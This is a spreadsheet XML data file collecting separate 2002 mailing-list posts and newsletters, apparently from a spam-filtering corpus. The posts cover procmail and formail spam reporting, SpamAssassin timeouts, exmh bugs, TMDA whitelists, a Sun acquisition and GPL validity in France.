 Samsung paired up with F.A. Porsche designers to deliver the SyncMaster 171P, a sleek, 17-inch LCD.&lt;/font&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;&lt;td colspan="3"&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=3 width=1&gt;&lt;br /&gt;&lt;img src="http://techupdate.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0" alt="" /&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=6b-8g5ZIHEXsAslw5D80ywQ-4d0P6cR" style="text-decoration:none"&gt;Read review&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;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&lt;b&gt;Monitors&lt;/b&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="7" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;1&lt;/b&gt;. &lt;a href="http://clickthru.online.com/Click?q=80-KTKvQQ0J6e1530OoaDkjVsTLZ8iR" style="text-decoration:none"&gt;Samsung SyncMaster 151S&lt;/a&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;2&lt;/b&gt;. &lt;a href="http://clickthru.online.com/Click?q=95-XdwrQvdKme0F5P2r1yZeU_u_KnPR" style="text-decoration:none"&gt;NEC MultiSync 1550V&lt;/a&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;3&lt;/b&gt;. &lt;a href="http://clickthru.online.com/Click?q=aa-gBteQXUQ1tMu2muWLXZBXqONOVnR" style="text-decoration:none"&gt;Envision EN-5100e&lt;/a&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;4&lt;/b&gt;. &lt;a href="http://clickthru.online.com/Click?q=bf-JtRfQ8ZQw9mZ4Dr5w8PF_jEuwteR" style="text-decoration:none"&gt;Samsung SyncMaster 570 V&lt;/a&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;5&lt;/b&gt;. &lt;a href="http://clickthru.online.com/Click?q=d4-E0SqQ0EHePb-J6V_4Mc3148lk6yR" style="text-decoration:none"&gt;Samsung SyncMaster 955 DF&lt;/a&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="6" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;img src="http://techupdate.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0" alt="" /&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=e9-gdzpQxVIgR2dE1fTRnU3P83P5XlR" style="text-decoration:none"&gt;More popular monitors&lt;/a&gt;&lt;/b&gt;&lt;br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href="http://clickthru.online.com/Click?q=ff-sVoVQmsafyrkiClZxrhBm0WHtheR" &gt;Acer brings P4 power to the people - read the review at ZDNet. &lt;/A&gt;
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=14-5MRAIF-I4Nk-VZs8ZvQIzTKtR1yR" &gt;Download Builder.com's 'Remedial XML' series.&lt;/A&gt;
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=29-Sg_rIjM3x2LMfqsNyGEI9rCM8vlR" &gt;Need a memory upgrade? Find out with CNET"s Memory Configurator.&lt;/A&gt;
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=3e-F51nIizcfEC5Hq3_7DQESNPe-i4R" &gt;Tech Update: Put a lid on CRM costs with self-service.  &lt;/A&gt;
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=53-n86dINniB4HdXxZjHpx8lOheMncR" &gt;Check out thousands of IT job listings in ZDNet"s Career Center.&lt;/A&gt;
 &lt;/b&gt;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href='http://clickthru.online.com/Click?q=68-iMJqz9Pku19uzpYosgKgJxiJPlTK5RRR'&gt;Unsubscribe&lt;/a&gt;&amp;nbsp;|
         &amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-zdnet@example.com&amp;brand=zdnet'&gt;Manage
         My Subscriptions&lt;/a&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=7d-FFEqIDLWMoHw-OPUywq2NRJSBTZR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|
         &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=92-ubRVQTzF9OBlxtGzeFOPq1FsnynR"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href="http://clickthru.online.com/Click?q=a8-02XZQQZDjuerEN6DtZs6swzdONiR" &gt;&lt;img src="http://www.zdnet.com/graphics/newsletters/gl_ft.gif" width=75 height=43 border=0 alt="ZDNet"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width=525&gt;&lt;font face="arial, helvetica" size="-2" color="#ffffff"&gt;&lt;a href="http://clickthru.online.com/Click?q=bd-c0nUQ7pV9LbqKtqpAEVgnfqGsJPR" style="color: #fff"&gt;Home&lt;/a&gt; |&lt;a href="http://clickthru.online.com/Click?q=d2-THo_QULs_KA-3PW3Gl22vbAOyenR" style="color: #fff"&gt;eBusiness&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=e7-2y-GQmVceNvMCD0VqS8CMB0qvseR" style="color: #fff"&gt;Security&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=fc-WpHmQVwTaZFP4xPa9-0t3VVat9yR" style="color: #fff"&gt;Networking&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=11-l8riI2-aPmsepxjX3VynhNBuCqlR" style="color: #fff"&gt;Applications&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=26-KqPVIiMxeryPsSdBBBkqU8niQ74R" style="color: #fff"&gt;Platforms&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=3b-XhxVINdxK72zLonFPcZsjpRp-LrR" style="color: #fff"&gt;Hardware&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=50-M_CBIR0cwu063rwASOnO8CtmMgRR"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src="http://gserv.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136482&amp;NL=e539&amp;ISSUE=2002-07-22" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- /footer --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=67-PnOknqEORnCwwAynubeTJ6SQE9RR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: [Razor-users] Ricochet Question Actually
</t>
  </si>
  <si>
    <t xml:space="preserve">
 formail did the trick. Thanks to those who answered. For the sake of
 archives, here's how to "patch" ricochet:
 1. procmailrc (/tmp/pmrc):
 RICOCHET=/usr/local/etc/ricochet
 PMDIR=/tmp
 LOGFILE=$PMDIR/pmlog
 VERBOSE=yes
 MAILDIR=/tmp
 LOGABSTRACT=all
 :0 f
 | /usr/local/bin/ri2
 2. /usr/local/bin/ri2 (to test):
 #!/bin/sh
 /usr/local/bin/ricochet -DONT_SEND &gt;/tmp/rico.$$
 3. formmail exec:
 formail -ds procmail /tmp/pmrc &lt;/tmp/spm
 -end-
 Sorry for such brief instructions. The only problem here is that I get
 another copy of the spam in the spambox again. This can be fixed with some
 procmailrc tweaking (the ":0 f" part).
 Cheers,
 -zeek
 &gt; -----Original Message-----
 &gt; From: razor-users-admin@example.sourceforge.net
 &gt; [mailto:razor-users-admin@lists.sourceforge.net]On Behalf Of Sven
 &gt; Willenberger
 &gt; Sent: Tuesday, August 13, 2002 4:06 PM
 &gt; To: zeek@sparklehouse.com
 &gt; Cc: razor-users@example.sourceforge.net
 &gt; Subject: Re: [Razor-users] Ricochet Question Actually
 &gt;
 &gt;
 &gt;
 &gt;
 &gt; ----- Original Message -----
 &gt; &gt; From: "zeek" &lt;zeek@sparklehouse.com&gt;
 &gt; &gt; To: &lt;razor-users@example.sourceforge.net&gt;
 &gt; &gt; Date: Tue, 13 Aug 2002 12:07:10 -0400
 &gt; &gt; Subject: [Razor-users] Ricochet Question Actually
 &gt; &gt;
 &gt; &gt;
 &gt; &gt; Greetings,
 &gt; &gt;
 &gt; &gt; I've not been able to find a list regarding ricochet (closely related to
 &gt; &gt; razor: http://www.vipul.net/ricochet/) so I'm posting here.
 &gt; &gt;
 &gt; &gt; Every few days I manually go through a spam harvest that Spamassassin
 &gt; &gt; collects (by way of checking against osirosoft, razor, et.
 &gt; al.). I do this
 &gt; &gt; with elm and for each piece of verified spam I pipe it to ricochet which
 &gt; &gt; sends it off to the various parties involved (not as accurate
 &gt; as I'd like
 &gt; &gt; BTW). Needless to mention this is quite tedious and takes a considerable
 &gt; &gt; amount of time.
 &gt; &gt;
 &gt; &gt; My question, which is more of a perl/regexp question, is anyone
 &gt; aware of a
 &gt; &gt; script that can take an entire mailbox (in proper UNIX mbox format) and
 &gt; &gt; handle each piece of mail in it? To clarify, I'm looking for something
 &gt; which
 &gt; &gt; takes each piece of mail in a mailbox and pipes it to ricochet. This is
 &gt; very
 &gt; &gt; similar to what razor-report does with the -M option.
 &gt; &gt;
 &gt;
 &gt; Assuming that you have procmail installed you also have its companion
 &gt; formail. Formail can be used to parse an mbox into its component
 &gt; emails and
 &gt; pass them to procmail. Specifiy a procmailrc file to use to
 &gt; filter/test/send
 &gt; each email and you're good to go. You could even set it up as a cron ...
 &gt;
 &gt; example: assuming your mailbox/email is "spambox"
 &gt;
 &gt; `formail -ds procmail /home/spambox/customProcmailrc &lt; /var/mail/spambox`
 &gt;
 &gt; This will take the mbox /var/mail/spambox break it apart at the message
 &gt; separator ('^From '), send it off to procmail and instruct procmail to use
 &gt; the "customProcmailrc" config file found in spambox's home directory. That
 &gt; "customProcmailrc" would contain your rules for how to handle
 &gt; each mail and
 &gt; send it where it needs to go ....
 &gt;
 &gt;
 &gt; &gt; Cheers,
 &gt; &gt; -zeek
 &gt; &gt;
 &gt; &gt;
 &gt; &gt;
 &gt; &gt; --__--__--
 &gt; &gt;
 &gt; &gt; Message: 11
 &gt; &gt; Date: Tue, 13 Aug 2002 11:58:03 -0500
 &gt; &gt; To: razor-users@example.sourceforge.net
 &gt; &gt; From: Justin Shore &lt;listuser@neo.pittstate.edu&gt;
 &gt; &gt; Subject: [Razor-users] Stripping the SpamAssassin report
 &gt; &gt;
 &gt; &gt; I'm assuming I need to strip the SpamAssassinReport.txt attachments
 &gt; &gt; from my spam mailbox before I run the mailbox through razor-report,
 &gt; &gt; correct?  Does anyone know of an easy way to do this?
 &gt; &gt;
 &gt; &gt; Thanks
 &gt; &gt;   Justin
 &gt; &gt; --
 &gt; &gt;
 &gt; &gt; --
 &gt; &gt; Justin Shore, ES-SS ES-SSR      Pittsburg State University
 &gt; &gt; Network &amp; Systems Manager       Kelce 157Q
 &gt; &gt; Office of Information Systems   Pittsburg, KS 66762
 &gt; &gt; Voice: (620) 235-4606           Fax: (620) 235-4545
 &gt; &gt; http://www.pittstate.edu/ois/
 &gt; &gt;
 &gt; &gt; Warning:  This message has been quadruple Rot13'ed for your protection.
 &gt; &gt;
 &gt; &gt;
 &gt; &gt;
 &gt; &gt; --__--__--
 &gt; &gt;
 &gt; &gt; _______________________________________________
 &gt; &gt; Razor-users mailing list
 &gt; &gt; Razor-users@lists.sourceforge.net
 &gt; &gt; https://lists.sourceforge.net/lists/listinfo/razor-users
 &gt; &gt;
 &gt; &gt;
 &gt; &gt; End of Razor-users Digest
 &gt;
 &gt;
 &gt;
 &gt; -------------------------------------------------------
 &gt; This sf.net email is sponsored by: Dice - The leading online job board
 &gt; for high-tech professionals. Search and apply for tech jobs today!
 &gt; http://seeker.dice.com/seeker.epl?rel_code=31
 &gt; _______________________________________________
 &gt; Razor-users mailing list
 &gt; Razor-users@lists.sourceforge.net
 &gt; https://lists.sourceforge.net/lists/listinfo/razor-users
 &gt;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</si>
  <si>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Wedding music
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/10/09.html#wedding_music
 Date: 2002-10-09T23:41:26-05:00
 It's confirmed: Dora and I will be walking down the aisle to the sounds of the 
 Triangle Tuba Quartet[1]. That is just too cool for words.
 [1] http://www.duke.edu/~ieisen/ttq.html
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAtalk] RBL timed oiut and Spam Assassin killed
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sun, 15 Sep 2002, Vernon Webb wrote:
 &gt; I'm getting these messages and I'm not sure what they mean. Can anyone clear 
 &gt; this up for me? Thanks.
 &gt; 
 &gt; Sep 15 11:45:09 linux mailscanner[6128]: RBL Check ORDB-RBL timed out and 
 &gt; was killed, consecutive failure 3 of 7
 &gt; Sep 15 11:45:24 linux mailscanner[6128]: SpamAssassin timed out and was 
 &gt; killed
 Your running mailscanner and the timeout used got to check ORDB-RBL is too 
 low and your timing out.  mailscanner will count up to seven timeouts and 
 then automatically disable these checks until it restarts itself (within 4 
 hours).
 -- 
 Gerry
 "The lyfe so short, the craft so long to learne"  Chaucer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</si>
  <si>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zzzz,All New! Breast Enhancement
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, 24 Jul 2002, Mike Masnick wrote:
 &gt; Adds to the level of annoyance, and makes it even less likely that I'll
 &gt; ever use it.
 Which annoyance? A string like f70539bb32961f3d7dba42a9c51442c1218a9100
 somewhere in the message inserted by the system automatically doesn't 
 change anything. Besides, there are simpler solutions:
 	http://tmda.net/faq.cgi?req=all#4.10
 &gt; They don't have to.  All they have to do is use some program (which, if
 &gt; they don't exist already, will certainly be around someday soon) that makes
 &gt; every spam they send show the recipient as the "from" address as well.
 See above.
 &gt; The adding manually thing doesn't seem like much fun.  And, anytime I speak
 So is installing the software. But you do it once.
 &gt; to someone new, it just makes it more unlikely that they will be willing to
 &gt; contact me.  Having played around with whitelists in the past, you'd be
 	http://tmda.net/faq.cgi?req=all#1.5
 &gt; amazed at how confused many people get by them as well.  They tend to
 &gt; ignore the "please apply" messages.
 &gt; 
 &gt; As an aside, am I the only person around who simply does not use the
 &gt; addressbook feature in email programs?  I never have, and I don't see any
 I usually don't use it. Just to lookup addresses/names of people I forget, 
 once in a while.
 &gt; reason to.  It (along with not opening attachments) has helped me not to
 &gt; send out viruses to people.  I generally use my own brain or my inbox as an
 Viruses? Other people's problem. Last virus I had was in 1988, or so.
 &gt; addressbook, and search out the last email I received from someone and hit
 &gt; reply...
 &gt; 
 &gt; &gt;&gt; email.  I could see certain friends of mine getting fairly annoyed
 &gt; &gt;&gt; (especially those with multiple email addresses...).
 &gt; &gt;
 &gt; &gt;What's the point of multiple email addresses? They're a pain.
 &gt; 
 &gt; Well, yes.  *I* use one email address, but that doesn't mean all my friends
 &gt; do.  You would need to convince everyone I know of that.  Most people I
 Maybe your friends should get used to tagged message delivery, then.
 &gt; know, at the very least, have a home and work email address.  But plenty
 &gt; others have other addresses for various reasons.  Keeping track of all of
 &gt; them for a whitelist seems like a pain.  It forces them to remember which
 &gt; email addresses are already approved and avoid using others.
 You have strange friends.
 &gt; Plus, I know plenty of people who change jobs, and suddenly get a new email
 &gt; address from their new job.  Wouldn't it suck if, in sending out your new
 Why should changing my job change my private address? I don't use 
 corporate mail for private purposes.
 &gt; job info, you had to fill out a new application for each friend just to
 &gt; tell them about your new job email address?
 I don't think this is a significant problem in practice.
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [use Perl] Stories for 2002-10-10
</t>
  </si>
  <si>
    <t xml:space="preserve">use Perl Daily Newsletter
 In this issue:
     * TPF October Newsletter
 +--------------------------------------------------------------------+
 | TPF October Newsletter                                             |
 |   posted by pudge on Tuesday October 08, @22:35 (links)            |
 |   http://use.perl.org/article.pl?sid=02/10/08/1836210              |
 +--------------------------------------------------------------------+
 [0]delegatrix writes "The October edition of the [1]Perl Foundation
 newsletter has been posted. This newsletter includes an interview with
 White Camel winner Tim Maher."
 Discuss this story at:
     http://use.perl.org/comments.pl?sid=02/10/08/1836210
 Links:
     0. mailto:lisa@perl.org
     1. http://perlfoundation.org/index.cgi?page=newsletter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</si>
  <si>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[zzzzteana] Bad Buffalo
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;peter fwded:
 &gt;&gt;Finally, Constable Evans hurled a thong at the animal, hitting it on the
 &gt;&gt;head.
 &gt;
 &gt;I know this isn't *quite* as funny to Australians as it is to
 &gt;everyone else. Honestly.
 &gt;
 &gt;Rachel
 &gt;not that walloping it with a flip-flop isn't hilarious too...
 &gt;--
 well unless you used the thong like a sling shot.....
 -- 
 Fel
 http://www.frogstone.net
 Weird Page: http://my.athenet.net/~felinda/WeirdPage.html
 [Non-text portions of this message have been removed]
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 4 DVDs Free +s&amp;p Join Now
 http://us.click.yahoo.com/pt6YBB/NXiEAA/MVfIAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Wired: "An urgent business proposition and requests for urgent
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/24#When:4:10:18AM
 Date: Tue, 24 Sep 2002 11:10:18 GMT
 Wired[1]: "An urgent business proposition and requests for urgent assistance 
 from a so-called Nigerian official were heeded by a Detroit bank secretary in 
 the latest example of how the ubiquitous e-mail scam actually works."
 [1] http://www.wired.com/news/business/0,1367,55329,00.html
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Upgrade
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Forwarded-by: Nev Dull &lt;nev@sleepycat.com&gt;
 Forwarded-by: Gene Spafford &lt;spaf@cerias.purdue.edu&gt;
 Forwarded-by: Sean Ennis &lt;ennis@avant.ca&gt;
 Forwarded-by: dpbsmith@bellatlantic.net (Daniel P. B. Smith)
 "I've started referring to the proposed action against Iraq as Desert
 Storm 1.1, since it reminds me of a Microsoft upgrade: it's expensive,
 most people aren't sure they want it, and it probably won't work."
 		-- Kevin G. Barkes
</t>
  </si>
  <si>
    <t xml:space="preserve">--==_Exmh_1141066573P
 Content-Type: text/plain; charset=us-ascii
 &gt; From:  Chris Garrigues &lt;cwg-exmh@DeepEddy.Com&gt;
 &gt; Date:  Wed, 21 Aug 2002 10:17:45 -0500
 &gt;
 &gt; Ouch...I'll get right on it.
 &gt; 
 &gt; &gt; From:  Robert Elz &lt;kre@munnari.OZ.AU&gt;
 &gt; &gt; Date:  Wed, 21 Aug 2002 19:30:01 +0700
 &gt; &gt;
 &gt; &gt; can't read "flist(totalcount,unseen)": no such element in array
 &gt; &gt;     while executing
 &gt; &gt; "if {$flist(totalcount,$mhProfile(unseen-sequence)) &gt; 0} {
 &gt; &gt; 	FlagInner spool iconspool labelup
 &gt; &gt;     } else {
 &gt; &gt; 	FlagInner down icondown labeldown
 &gt; &gt;     }"
 &gt; &gt;     (procedure "Flag_MsgSeen" line 3)
 Fixed in CVS.
 &gt; &gt; Second, I've been used to having a key binding which was to Msg_MarkUnseen
 &gt; &gt; which doesn't seem to exist any more, and I'm not sure what I should replace
 &gt; &gt; that with.   There's obviously a way as the "Sequences" menu does this.
 &gt; &gt; The "Mark Unseen" menu entry in the message "More" menu is still wanting
 &gt; &gt; that function as well...
 {Msg_Mark unseen}
 I'm not sure how I missed the need to fix this in app-defaults for "Mark 
 Unseen".  I guess that'll be my next CVS fix.
 &gt; &gt;   | For those who have other sequences defined, the window will widen to
 &gt; &gt;   | display the other sequences.
 &gt; &gt; 
 &gt; &gt; Any chance of having that lengthen instead?   I like all my exmh stuff
 &gt; &gt; in nice columns (fits the display better).   That is, I use the detached
 &gt; &gt; folder list, one column.   The main exmh window takes up full screen,
 &gt; &gt; top to bottom, but less than half the width, etc...
 I thought about that.  The first order approximation would be to just add 
 using pack .... -side top instead of pack ... -side left, however, since their 
 each a different width, it would look funny.
 &gt; &gt; I have space for more sequences, in the "unseen" window, as long as they
 &gt; &gt; remain once nice narrow window (best would be if the sequences could be
 &gt; &gt; ordered by some preference, then ones which didn't fit would just fall
 &gt; &gt; off the bottom, and not be shown).
 &gt; &gt; 
 &gt; &gt; I'd also prefer it if that window had no unusual background colouring,
 &gt; &gt; just one constant colour - I have been running the unseen window with
 &gt; &gt; background black, on a root window that is all black, with no borders or
 &gt; &gt; other decorations, but made "sticky" - the appearance is just like the
 &gt; &gt; folders with unseen messages (and their counts) are written into the
 &gt; &gt; root window (because it is sticky, this small display follows me around
 &gt; &gt; and do I can see when new mail needs processing).
 The background color in this window is the same as the background 
 color in the ftoc.
 &gt; &gt; I also find that I tend to have a bunch of sequences that only ever occur
 &gt; &gt; in one folder (some I had forgotten I ever created).  So in addition to
 &gt; &gt; the "sequences to always show" and "sequences to never show", a
 &gt; &gt; preference to only show sequences that occur in more than one folder
 &gt; &gt; would be useful, and then have the sequences that occor only in the
 &gt; &gt; folder I'm visiting appear in the list when that folder is current.
 &gt; &gt; This is just to keep the list size somewhat manageable while remaining
 &gt; &gt; productive (I quite often use a sequence to remember a particular message
 &gt; &gt; in a folder - the name is used only there, and only for one message,
 &gt; &gt; it gives me a handle on the message which remains as the folder is
 &gt; &gt; packed, sorted, etc).
 hmmm, let me think about it.
 &gt; &gt; I haven't updated my exmh for some time now, so I'm not sure if this
 &gt; &gt; next one is new, or just new since 2.5, but the Sequences menu (on the
 &gt; &gt; bar with New Flist Search ...) only contains "unseen" and "urgent".
 &gt; &gt; It would be useful if it contained all of the sequences that the folder
 &gt; &gt; happens to have defined.   A "New sequence" entry would also be useful
 &gt; &gt; (to mark the message with a sequence name that didn't previously exist,
 &gt; &gt; which can be done now using "Search" and the pick interface, but is
 &gt; &gt; clumsy that way)
 The only sequences that are defined there are sequences which are defined in 
 app-defaults-color or ~/exmh/exmh-defaults-color.  I've been thinking about 
 how to dynamically generate highlighting for other sequences, but haven't got 
 that figured out yet.
 &gt; &gt; Actually, you once could, now when I try this, entering a sequence name
 &gt; &gt; in the pick box, and a single message number, or a range N-N in the
 &gt; &gt; list of messages, and no pick attributes at all, I now get ...
 &gt; &gt; 
 &gt; &gt; syntax error in expression "int(1+1+(1 hit-1)*(3868-1-2)/(4878-1))"
 &gt; &gt;     while executing
 &gt; &gt; "expr int($minlineno+1+($msgid-$minmsgid)*($maxlineno-$minlineno-2)/($max
 &gt; ms
 &gt; &gt; gid-$minmsgid))"
 &gt; &gt;     (procedure "Ftoc_FindMsg" line 46)
 &gt; &gt;     invoked from within
 &gt; &gt; "Ftoc_FindMsg $msg"
 &gt; &gt;     (procedure "Ftoc_FindMsgs" line 5)
 &gt; &gt;     invoked from within
 &gt; &gt; "Ftoc_FindMsgs $msgids"
 &gt; &gt;     (procedure "Ftoc_PickMsgs" line 5)
 &gt; &gt;     invoked from within
 &gt; &gt; "Ftoc_PickMsgs $pick(ids) $pick(addtosel)"
 &gt; &gt;     (procedure "PickInner" line 13)
 &gt; &gt;     invoked from within
 &gt; &gt; "PickInner {exec pick +inbox -list} {4852 -sequence mercury}"
 &gt; &gt;     ("uplevel" body line 1)
 &gt; &gt;     invoked from within
 &gt; &gt; "uplevel #0 $cmd"
 &gt; &gt;     (procedure "busyCursorInner" line 8)
 &gt; &gt;     invoked from within
 &gt; &gt; "busyCursorInner $cmd $widgets"
 &gt; &gt;     (procedure "busyCursorHack" line 32)
 &gt; &gt;     invoked from within
 &gt; &gt; "busyCursorHack $args"
 &gt; &gt;     ("cursor" arm line 1)
 &gt; &gt;     invoked from within
 &gt; &gt; "switch $busy(style) {
 &gt; &gt; 	icon		{busyIcon $args}
 &gt; &gt; 	cursorAll	{busyCursor $args}
 &gt; &gt; 	cursor		{busyCursorHack $args}
 &gt; &gt; 	default		{eval $args}
 &gt; &gt;     }"
 &gt; &gt;     (procedure "busy" line 3)
 &gt; &gt;     invoked from within
 &gt; &gt; "busy PickInner $cmd $msgs"
 &gt; &gt;     (procedure "Pick_It" line 51)
 &gt; &gt;     invoked from within
 &gt; &gt; "Pick_It"
 &gt; &gt;     invoked from within
 &gt; &gt; ".pick.but.pick invoke"
 &gt; &gt;     ("uplevel" body line 1)
 &gt; &gt;     invoked from within
 &gt; &gt; "uplevel #0 [list $w invoke]"
 &gt; &gt;     (procedure "tkButtonUp" line 7)
 &gt; &gt;     invoked from within
 &gt; &gt; "tkButtonUp .pick.but.pick
 &gt; &gt; "
 &gt; &gt;     (command bound to event)
 &gt; &gt; 
 &gt; &gt; It has been ages since I did this last though.   I tried adding a Subject
 &gt; &gt; to pick on (easy as I know what's in the message...) which made no differ
 &gt; en
 &gt; &gt; ce.
 &gt; &gt; Looks as if something is now saying "1 hit" when before it didn't, or
 &gt; &gt; similar.
 hmmm, that may or may not be my fault...I'll take a look at it.
 &gt; &gt;   | I've also changed the ftoc colorization as discussed briefly on the l
 &gt; is
 &gt; &gt; t a 
 &gt; &gt;   | week or so ago.
 &gt; &gt; 
 &gt; &gt; Any chance of making the current message a little brighter background?
 &gt; &gt; Just to make it stand out a fraction more than it does (maybe this is
 &gt; &gt; more apparent to me than many, as I use very small fonts everywhere,
 &gt; &gt; the background of the ftoc line isn't very wide).
 I don't see any reason why not.  Experiment and let me know what works for you.
 Chris
 -- 
 Chris Garrigues                 http://www.DeepEddy.Com/~cwg/
 virCIO                          http://www.virCIO.Com
 716 Congress, Suite 200
 Austin, TX  78701		+1 512 374 0500
   World War III:  The Wrong-Doers Vs. the Evil-Doers.
 --==_Exmh_1141066573P
 Content-Type: application/pgp-signature
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.6 (GNU/Linux)
 Comment: Exmh version 2.2_20000822 06/23/2000
 iD8DBQE9Y7R3K9b4h5R0IUIRAvJfAJoDZLxM2iVMWeUGj9DG/oZrYYpsMACfZkY3
 m1ILEOc5OmYxICv/ifINPxY=
 =3Rdb
 -----END PGP SIGNATURE-----
 --==_Exmh_1141066573P--
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Sun Nabs Storage Startup - buys Pirus Networks
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Related to the MS acquisition of XDegrees?
 ==
 http://www.internetnews.com/infra/article.php/1466271
 Sun Nabs Storage Startup
 By Clint Boulton
 Amid the flurry of news at its own SunNetwork 2002 conference in San
 Francisco, Sun Microsystems Thursday said it has agreed to purchase data
 storage concern Pirus Networks for an undisclosed amount of stock.
 The Palo Alto, Calif. networking firm bought the Acton, Mass.-based startup
 with a keen eye for the startup's switching (define) devices and
 virtualization technology. Used as part of a storage area network (define),
 virtualization is the pooling of storage from many network storage devices
 into what appears to the operating system to be a single storage device that
 is managed from a central console.
 Though major vendors make similar technology, Pirus competes with the likes
 of Rhapsody Networks and Confluence Networks. Sun plucked Pirus after
 scouting some 65 companies.
 Mark Lovington, vice president of marketing for Pirus, told internetnews.com
 that Pirus and Sun have been in discussion for a while about a possible
 acquisition. Pirus, he said, succeeded in a goal it shares with a lot of
 storage startups -- to be acquired by one of the major systems vendors, such
 as Sun IBM, HP, Hitachi.
 "This is a huge opportunity for Pirus in a storage market dominated by 6,7
 or 8 system-level players," Lovington said. "Sun sees this acquisition as a
 critical element to their N1 initiative. The synergies were quite obvious."
 N1 is Sun's hopeful tour de force in distributed computing (define)
 architecture, which involves multiple, remote computers that each have a
 role in a computation problem or information processing. N1 is being styled
 as the answer for companies looking to manage groups of computers and
 networks as a single system -- at a lower cost and with greater flexibility.
 While lagging behind other, more entrenched players, Sun is gaining ground
 in the storage market with its Sun StorEdge Complete Storage Solutions,
 according to a new report by IDC. John McArthur, group vice president of
 IDC's Storage program, said Sun Microsystems and IBM posted the largest
 increases in total storage revenue over Q1 2002, with 32% and 11% gains,
 respectively. As of Q2, Sun held a 9 percent market share, with revenues of
 $411 million.
 Sun's acquisition of Pirus is expected to close in the second quarter of
 Sun's 2003 fiscal year, which ends December 29, 2002.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] Interesting article on free software licences
</t>
  </si>
  <si>
    <t xml:space="preserve">David Neary said:
 &gt;
 &gt; For the francophones among you, this article is a summary of the
 &gt; reasons why most free software licences (and the GPL in
 &gt; particular) are not valid in France.
 &gt;
 &gt; http://www.linuxfrench.net/article.php3?id_article=1043
 &gt;
 &gt; Google translation (hard to read most of the time, but good
 &gt; enough to pick up the gist)
 &gt;
 &gt; http://makeashorterlink.com/?U26B52602
 &gt;
 &gt; In brief, in an international contract, when mentioning copyright,  you
 &gt; must mention under which jurisdiction's laws the copyright
 &gt; is applied. French law requires the licence to be available in
 &gt; French (the GPL isn't). And French law requires that for a
 &gt; contract to be valid, it must not breach existing law. Also under
 &gt; French law, the copyright holder automatically retains the right
 &gt; to change the licence, which means that French law is in conflict
 &gt; with the GPL, which requires authorisation from all authors
